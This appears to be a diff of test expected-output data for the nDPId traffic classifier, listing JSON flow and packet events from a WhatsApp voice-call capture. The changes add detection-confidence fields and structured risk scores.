-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1561455731697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455731697,"pkt":"kLkxKPrKxiwDYGpkCABFAABI\/gUAADERNLxb\/DgzwKgCDH\/A3AgANISZAAEAGCESpEKSaahiiU3KFyQDpDgACAAUPvQQqrwwB3kMX1876e4ssz8N17Y="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1561455732298,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455732298,"pkt":"xiwDYGpkkLkxKPrKCABFAABIre0AAEARuofAqAIMATxOQNwI+xoANHLOAAEAGCESpEIrgAUzrwTeBSrSSH8ACAAUv8Ev3sei+dcRfEZy9ei0mRui3Zw="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1561455732919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455732919,"pkt":"xiwDYGpkkLkxKPrKCABFAABIV+kAAEAREIzAqAIMATxOQNwI+xoANBvDAAEAGCESpELCs7YUVt8QVzF73yEACAAUMmINwHB46SKyj3xrODHnuD6GHSA="}
-00657{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
-00666{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
+00683{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
+00692{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1561455741430,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1561455741430,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClZnoAAAIRnx\/AqAIM7\/\/\/+sQPB2wAke7DTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1561455741432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1561455741432,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClgs4AAAIRgsvAqAIM7\/\/\/+uDKB2wAkdIITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1561455741484,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1561455741484,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4hv4AAEABnOPAqAIMW\/w4MwMDoFgAAAAARQAA73IeAAAxEb\/8W\/w4M8CoAgx\/wNwIANsAAA=="}
-00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659}
+00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1561455742405,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4TCgAAEAB17nAqAIMW\/w4MwMDoOEAAAAARQAAZumbAAAxEUkIW\/w4M8CoAgx\/wNwIAFIAAA=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1561455742405,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4HrIAAEABBTDAqAIMW\/w4MwMDoOEAAAAARQAAZp1RAAAxEZVSW\/w4M8CoAgx\/wNwIAFIAAA=="}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
 00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"}}
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":180000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
